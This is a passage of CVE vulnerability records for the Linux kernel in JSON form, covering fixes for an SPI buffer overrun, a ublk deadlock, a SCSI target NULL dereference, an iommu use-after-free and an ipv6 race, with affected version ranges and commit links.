"version": "4badd33929c05ed314794b95f1af1308f7222be8",
"versionType": "git"
},
{
"lessThan": "837a23a11e0f734f096c7c7b0778d0e625e3dc87",
"status": "affected",
"version": "7f6738e003b364783f3019fdf6e7645bc8dd1643",
"versionType": "git"
},
{
"lessThan": "3dd6d01384823e1bd8602873153d6fc4337ac4fe",
"status": "affected",
"version": "fc96ec826bced75cc6b9c07a4ac44bbf651337ab",
"versionType": "git"
},
{
"lessThan": "743cebcbd1b2609ec5057ab474979cef73d1b681",
"status": "affected",
"version": "fc96ec826bced75cc6b9c07a4ac44bbf651337ab",
"versionType": "git"
},
{
"lessThan": "be0b613198e6bfa104ad520397cab82ad3ec1771",
"status": "affected",
"version": "fc96ec826bced75cc6b9c07a4ac44bbf651337ab",
"versionType": "git"
},
{
"lessThan": "1417927df8049a0194933861e9b098669a95c762",
"status": "affected",
"version": "fc96ec826bced75cc6b9c07a4ac44bbf651337ab",
"versionType": "git"
},
{
"status": "affected",
"version": "42c04316d9275ec267d36e5e9064cd56c9884148",
"versionType": "git"
},
{
"status": "affected",
"version": "dc120f2d35b030390a2bc0f94dd5f37e900cae91",
"versionType": "git"
},
{
"status": "affected",
"version": "b558275c1b040f0e5aa56c862241f9212b6118c3",
"versionType": "git"
},
{
"status": "affected",
"version": "b9d9e8856f1c83e4277403f9b4c369b322ebcb12",
"versionType": "git"
},
{
"status": "affected",
"version": "36a6d0f66c874666caf4e8be155b1be30f6231be",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/spi/spi-fsl-spi.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.4"
},
{
"lessThan": "6.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.181",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15.114",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.316",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.19.284",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.244",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.2.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.3.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: fsl-cpm: Check length parity before switching to 16 bit mode\n\nCommit fc96ec826bce (\"spi: fsl-cpm: Use 16 bit mode for large transfers\nwith even size\") failed to make sure that the size is really even\nbefore switching to 16 bit mode. Until recently the problem went\nunnoticed because kernfs uses a pre-allocated bounce buffer of size\nPAGE_SIZE for reading EEPROM.\n\nBut commit 8ad6249c51d0 (\"eeprom: at25: convert to spi-mem API\")\nintroduced an additional dynamically allocated bounce buffer whose size\nis exactly the size of the transfer, leading to a buffer overrun in\nthe fsl-cpm driver when that size is odd.\n\nAdd the missing length parity verification and remain in 8 bit mode\nwhen the length is not even."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:53.693Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c8f1d35076b78df61ace737e41cc1f4b7b63236c"
},
{
"url": "https://git.kernel.org/stable/c/9c34a4a2ead00979d203a8c16bea87f0ef5291d8"
},
{
"url": "https://git.kernel.org/stable/c/837a23a11e0f734f096c7c7b0778d0e625e3dc87"
},
{
"url": "https://git.kernel.org/stable/c/3dd6d01384823e1bd8602873153d6fc4337ac4fe"
},
{
"url": "https://git.kernel.org/stable/c/743cebcbd1b2609ec5057ab474979cef73d1b681"
},
{
"url": "https://git.kernel.org/stable/c/be0b613198e6bfa104ad520397cab82ad3ec1771"
},
{
"url": "https://git.kernel.org/stable/c/1417927df8049a0194933861e9b098669a95c762"
}
],
"title": "spi: fsl-cpm: Check length parity before switching to 16 bit mode",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68773",
"datePublished": "2026-01-13T15:28:50.686Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-19T12:18:53.693Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68823 (GCVE-0-2025-68823)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
Title
ublk: fix deadlock when reading partition table
Summary
In the Linux kernel, the following vulnerability has been resolved:
ublk: fix deadlock when reading partition table
When one process (such as udev) opens ublk block device (e.g., to read
the partition table via bdev_open()), a deadlock[1] can occur:
1. bdev_open() grabs disk->open_mutex
2. The process issues read I/O to ublk backend to read partition table
3. In __ublk_complete_rq(), blk_update_request() or blk_mq_end_request()
runs bio->bi_end_io() callbacks
4. If this triggers fput() on file descriptor of ublk block device, the
work may be deferred to current task's task work (see fput() implementation)
5. This eventually calls blkdev_release() from the same context
6. blkdev_release() tries to grab disk->open_mutex again
7. Deadlock: same task waiting for a mutex it already holds
The fix is to run blk_update_request() and blk_mq_end_request() with bottom
halves disabled. This forces blkdev_release() to run in kernel work-queue
context instead of current task work context, and allows ublk server to make
forward progress, and avoids the deadlock.
[axboe: rewrite comment in ublk]
Severity
No CVSS data available.
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/block/ublk_drv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0460e09a614291f06c008443f47393c37b7358e7",
"status": "affected",
"version": "71f28f3136aff5890cd56de78abc673f8393cad9",
"versionType": "git"
},
{
"lessThan": "c258f5c4502c9667bccf5d76fa731ab9c96687c1",
"status": "affected",
"version": "71f28f3136aff5890cd56de78abc673f8393cad9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/block/ublk_drv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.0"
},
{
"lessThan": "6.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nublk: fix deadlock when reading partition table\n\nWhen one process(such as udev) opens ublk block device (e.g., to read\nthe partition table via bdev_open()), a deadlock[1] can occur:\n\n1. bdev_open() grabs disk-\u003eopen_mutex\n2. The process issues read I/O to ublk backend to read partition table\n3. In __ublk_complete_rq(), blk_update_request() or blk_mq_end_request()\n runs bio-\u003ebi_end_io() callbacks\n4. If this triggers fput() on file descriptor of ublk block device, the\n work may be deferred to current task\u0027s task work (see fput() implementation)\n5. This eventually calls blkdev_release() from the same context\n6. blkdev_release() tries to grab disk-\u003eopen_mutex again\n7. Deadlock: same task waiting for a mutex it already holds\n\nThe fix is to run blk_update_request() and blk_mq_end_request() with bottom\nhalves disabled. This forces blkdev_release() to run in kernel work-queue\ncontext instead of current task work context, and allows ublk server to make\nforward progress, and avoids the deadlock.\n\n[axboe: rewrite comment in ublk]"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:25.392Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0460e09a614291f06c008443f47393c37b7358e7"
},
{
"url": "https://git.kernel.org/stable/c/c258f5c4502c9667bccf5d76fa731ab9c96687c1"
}
],
"title": "ublk: fix deadlock when reading partition table",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68823",
"datePublished": "2026-01-13T15:29:25.392Z",
"dateReserved": "2025-12-24T10:30:51.048Z",
"dateUpdated": "2026-01-13T15:29:25.392Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68782 (GCVE-0-2025-68782)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
Title
scsi: target: Reset t_task_cdb pointer in error case
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: target: Reset t_task_cdb pointer in error case
If allocation of cmd->t_task_cdb fails, it remains NULL but is later
dereferenced in the 'err' path.
In case of error, reset NULL t_task_cdb value to point at the default
fixed-size buffer.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 9e95fb805dc043cc8ed878a08d1583e4097a5f80 , < 6cac97b12bdab04832e0416d049efcd0d48d303b (git) Affected: 9e95fb805dc043cc8ed878a08d1583e4097a5f80 , < 45fd86b444105c8bd07a763f58635c87e5dc7aea (git) Affected: 9e95fb805dc043cc8ed878a08d1583e4097a5f80 , < 8727663ded659aad55eef21e3864ebf5a4796a96 (git) Affected: 9e95fb805dc043cc8ed878a08d1583e4097a5f80 , < 0260ad551b0815eb788d47f32899fbcd65d6f128 (git) Affected: 9e95fb805dc043cc8ed878a08d1583e4097a5f80 , < 0d36db68fdb8a3325386fd9523b67735f944e1f3 (git) Affected: 9e95fb805dc043cc8ed878a08d1583e4097a5f80 , < 8edbb9e371af186b4cf40819dab65fafe109df4d (git) Affected: 9e95fb805dc043cc8ed878a08d1583e4097a5f80 , < 5053eab38a4c4543522d0c320c639c56a8b59908 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/target/target_core_transport.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6cac97b12bdab04832e0416d049efcd0d48d303b",
"status": "affected",
"version": "9e95fb805dc043cc8ed878a08d1583e4097a5f80",
"versionType": "git"
},
{
"lessThan": "45fd86b444105c8bd07a763f58635c87e5dc7aea",
"status": "affected",
"version": "9e95fb805dc043cc8ed878a08d1583e4097a5f80",
"versionType": "git"
},
{
"lessThan": "8727663ded659aad55eef21e3864ebf5a4796a96",
"status": "affected",
"version": "9e95fb805dc043cc8ed878a08d1583e4097a5f80",
"versionType": "git"
},
{
"lessThan": "0260ad551b0815eb788d47f32899fbcd65d6f128",
"status": "affected",
"version": "9e95fb805dc043cc8ed878a08d1583e4097a5f80",
"versionType": "git"
},
{
"lessThan": "0d36db68fdb8a3325386fd9523b67735f944e1f3",
"status": "affected",
"version": "9e95fb805dc043cc8ed878a08d1583e4097a5f80",
"versionType": "git"
},
{
"lessThan": "8edbb9e371af186b4cf40819dab65fafe109df4d",
"status": "affected",
"version": "9e95fb805dc043cc8ed878a08d1583e4097a5f80",
"versionType": "git"
},
{
"lessThan": "5053eab38a4c4543522d0c320c639c56a8b59908",
"status": "affected",
"version": "9e95fb805dc043cc8ed878a08d1583e4097a5f80",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/target/target_core_transport.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.8"
},
{
"lessThan": "5.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: target: Reset t_task_cdb pointer in error case\n\nIf allocation of cmd-\u003et_task_cdb fails, it remains NULL but is later\ndereferenced in the \u0027err\u0027 path.\n\nIn case of error, reset NULL t_task_cdb value to point at the default\nfixed-size buffer.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:59.574Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6cac97b12bdab04832e0416d049efcd0d48d303b"
},
{
"url": "https://git.kernel.org/stable/c/45fd86b444105c8bd07a763f58635c87e5dc7aea"
},
{
"url": "https://git.kernel.org/stable/c/8727663ded659aad55eef21e3864ebf5a4796a96"
},
{
"url": "https://git.kernel.org/stable/c/0260ad551b0815eb788d47f32899fbcd65d6f128"
},
{
"url": "https://git.kernel.org/stable/c/0d36db68fdb8a3325386fd9523b67735f944e1f3"
},
{
"url": "https://git.kernel.org/stable/c/8edbb9e371af186b4cf40819dab65fafe109df4d"
},
{
"url": "https://git.kernel.org/stable/c/5053eab38a4c4543522d0c320c639c56a8b59908"
}
],
"title": "scsi: target: Reset t_task_cdb pointer in error case",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68782",
"datePublished": "2026-01-13T15:28:56.929Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-19T12:18:59.574Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71071 (GCVE-0-2025-71071)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-13 15:31
Title
iommu/mediatek: fix use-after-free on probe deferral
Summary
In the Linux kernel, the following vulnerability has been resolved:
iommu/mediatek: fix use-after-free on probe deferral
The driver is dropping the references taken to the larb devices during
probe after successful lookup as well as on errors. This can
potentially lead to a use-after-free in case a larb device has not yet
been bound to its driver so that the iommu driver probe defers.
Fix this by keeping the references as expected while the iommu driver is
bound.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 8412e5dd24ffc8bc21a00bfaa0b80d4596cdc9da , < 896ec55da3b90bdb9fc04fedc17ad8c359b2eee5 (git) Affected: 26593928564cf5b576ff05d3cbd958f57c9534bb , < 5c04217d06a1161aaf36267e9d971ab6f847d5a7 (git) Affected: 26593928564cf5b576ff05d3cbd958f57c9534bb , < 1ef70a0b104ae8011811f60bcfaa55ff49385171 (git) Affected: 26593928564cf5b576ff05d3cbd958f57c9534bb , < f6c08d3aa441bbc1956e9d65f1cbb89113a5aa8a (git) Affected: 26593928564cf5b576ff05d3cbd958f57c9534bb , < de83d4617f9fe059623e97acf7e1e10d209625b5 (git) Affected: 51080de72e26771f0ed9d44982974279ccbc92b8 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/iommu/mtk_iommu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "896ec55da3b90bdb9fc04fedc17ad8c359b2eee5",
"status": "affected",
"version": "8412e5dd24ffc8bc21a00bfaa0b80d4596cdc9da",
"versionType": "git"
},
{
"lessThan": "5c04217d06a1161aaf36267e9d971ab6f847d5a7",
"status": "affected",
"version": "26593928564cf5b576ff05d3cbd958f57c9534bb",
"versionType": "git"
},
{
"lessThan": "1ef70a0b104ae8011811f60bcfaa55ff49385171",
"status": "affected",
"version": "26593928564cf5b576ff05d3cbd958f57c9534bb",
"versionType": "git"
},
{
"lessThan": "f6c08d3aa441bbc1956e9d65f1cbb89113a5aa8a",
"status": "affected",
"version": "26593928564cf5b576ff05d3cbd958f57c9534bb",
"versionType": "git"
},
{
"lessThan": "de83d4617f9fe059623e97acf7e1e10d209625b5",
"status": "affected",
"version": "26593928564cf5b576ff05d3cbd958f57c9534bb",
"versionType": "git"
},
{
"status": "affected",
"version": "51080de72e26771f0ed9d44982974279ccbc92b8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/iommu/mtk_iommu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.2"
},
{
"lessThan": "6.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.0.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu/mediatek: fix use-after-free on probe deferral\n\nThe driver is dropping the references taken to the larb devices during\nprobe after successful lookup as well as on errors. This can\npotentially lead to a use-after-free in case a larb device has not yet\nbeen bound to its driver so that the iommu driver probe defers.\n\nFix this by keeping the references as expected while the iommu driver is\nbound."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:31:25.400Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/896ec55da3b90bdb9fc04fedc17ad8c359b2eee5"
},
{
"url": "https://git.kernel.org/stable/c/5c04217d06a1161aaf36267e9d971ab6f847d5a7"
},
{
"url": "https://git.kernel.org/stable/c/1ef70a0b104ae8011811f60bcfaa55ff49385171"
},
{
"url": "https://git.kernel.org/stable/c/f6c08d3aa441bbc1956e9d65f1cbb89113a5aa8a"
},
{
"url": "https://git.kernel.org/stable/c/de83d4617f9fe059623e97acf7e1e10d209625b5"
}
],
"title": "iommu/mediatek: fix use-after-free on probe deferral",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71071",
"datePublished": "2026-01-13T15:31:25.400Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-13T15:31:25.400Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71080 (GCVE-0-2025-71080)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
Title
ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT
On PREEMPT_RT kernels, after rt6_get_pcpu_route() returns NULL, the
current task can be preempted. Another task running on the same CPU
may then execute rt6_make_pcpu_route() and successfully install a
pcpu_rt entry. When the first task resumes execution, its cmpxchg()
in rt6_make_pcpu_route() will fail because rt6i_pcpu is no longer
NULL, triggering the BUG_ON(prev). It's easy to reproduce it by adding
mdelay() after rt6_get_pcpu_route().
Using preempt_disable/enable is not appropriate here because
ip6_rt_pcpu_alloc() may sleep.
Fix this by handling the cmpxchg() failure gracefully on PREEMPT_RT:
free our allocation and return the existing pcpu_rt installed by
another task. The BUG_ON is replaced by WARN_ON_ONCE for non-PREEMPT_RT
kernels where such races should not occur.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: d2d6422f8bd17c6bb205133e290625a564194496 , < 1dc33ad0867325f8d2c6d7b2a6f542d4f3121f66 (git) Affected: d2d6422f8bd17c6bb205133e290625a564194496 , < 787515ccb2292f82eb0876993129154629a49651 (git) Affected: d2d6422f8bd17c6bb205133e290625a564194496 , < 1adaea51c61b52e24e7ab38f7d3eba023b2d050d (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/route.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1dc33ad0867325f8d2c6d7b2a6f542d4f3121f66",
"status": "affected",
"version": "d2d6422f8bd17c6bb205133e290625a564194496",
"versionType": "git"
},
{
"lessThan": "787515ccb2292f82eb0876993129154629a49651",
"status": "affected",
"version": "d2d6422f8bd17c6bb205133e290625a564194496",
"versionType": "git"
},
{
"lessThan": "1adaea51c61b52e24e7ab38f7d3eba023b2d050d",
"status": "affected",
"version": "d2d6422f8bd17c6bb205133e290625a564194496",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/route.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.12"
},
{
"lessThan": "6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT\n\nOn PREEMPT_RT kernels, after rt6_get_pcpu_route() returns NULL, the\ncurrent task can be preempted. Another task running on the same CPU\nmay then execute rt6_make_pcpu_route() and successfully install a\npcpu_rt entry. When the first task resumes execution, its cmpxchg()\nin rt6_make_pcpu_route() will fail because rt6i_pcpu is no longer\nNULL, triggering the BUG_ON(prev). It\u0027s easy to reproduce it by adding\nmdelay() after rt6_get_pcpu_route().\n\nUsing preempt_disable/enable is not appropriate here because\nip6_rt_pcpu_alloc() may sleep.\n\nFix this by handling the cmpxchg() failure gracefully on PREEMPT_RT:\nfree our allocation and return the existing pcpu_rt installed by\nanother task. The BUG_ON is replaced by WARN_ON_ONCE for non-PREEMPT_RT\nkernels where such races should not occur."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:44.832Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1dc33ad0867325f8d2c6d7b2a6f542d4f3121f66"
},
{
"url": "https://git.kernel.org/stable/c/787515ccb2292f82eb0876993129154629a49651"
},
{
